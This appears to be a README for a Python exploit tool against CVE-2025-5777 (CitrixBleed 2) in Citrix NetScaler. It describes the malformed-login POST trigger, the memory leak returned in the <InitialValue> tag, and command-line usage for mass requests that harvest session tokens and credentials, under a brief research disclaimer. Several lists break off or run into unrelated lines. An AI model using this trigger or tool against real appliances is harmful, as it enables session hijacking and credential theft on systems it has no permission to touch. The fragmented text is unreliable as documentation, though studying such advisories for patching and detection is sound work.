
Python exploit for CVE-2025-5777 (CitrixBleed 2) memory leak in Citrix NetScaler. Sends malformed POST requests to leak ~127 bytes of RAM per request, extracting session tokens, credentials, and other sensitive data from uninitialized memory.
[!WARNING] This script is intended for educational and research purposes only. Do not use it against systems without explicit permission. Unauthorized access or testing is illegal and unethical. Read the full DISCLAIMER before using this script.
This project demonstrates a memory leak vulnerability (CVE-2025-5777) found in Citrix NetScaler appliances. The vulnerability results from improper handling of uninitialized memory when parsing malformed POST data, particularly the login parameter. It's widely known as CitrixBleed 2 because of its strong resemblance to the infamous CVE-2023-4966 (original CitrixBleed) which was heavily exploited in 2023
When the login field is included without an equal sign or value, a portion of uninitialized stack memory is returned inside the <InitialValue> tag in the XML response.

Data Leaked: Each HTTP request can leak approximately 127 bytes of RAM content. By repeating these requests, attackers can collect sensitive data from memory, which may include:
pip3 install aiohttp colorama
python3 exploit.py <URL> [options]
positional arguments:
url Base URL (e.g., http://target.com)
optional arguments:
-h, --help Show help message
-v, --verbose Enable debug output
-p, --proxy PROXY HTTP proxy URL (e.g., http://127.0.0.1:8080)
-t, --threads N Number of concurrent threads (default: 10)
-d, --delay SECONDS Delay between request batches in seconds (default: 1.0)
--max-requests N Maximum number of requests to send (default: unlimited)
-e, --endpoints PATH Additional endpoints to test (can specify multiple)
--no-save Don't save data to files on exit
Basic usage:
python3 exploit.py http://target.com
Verbose mode with proxy:
python3 exploit.py http://target.com -v -p http://127.0.0.1:8080
High concurrency with rate limiting:
python3 exploit.py http://target.com -t 20 -d 0.5
Limited requests with multiple endpoints:
python3 exploit.py http://target.com --max-requests 1000 -e /p/u/doAuthentication.do /api/auth
Help:
python3 exploit.py -h
This enhanced version includes:
This advanced Python script:
<InitialValue> tags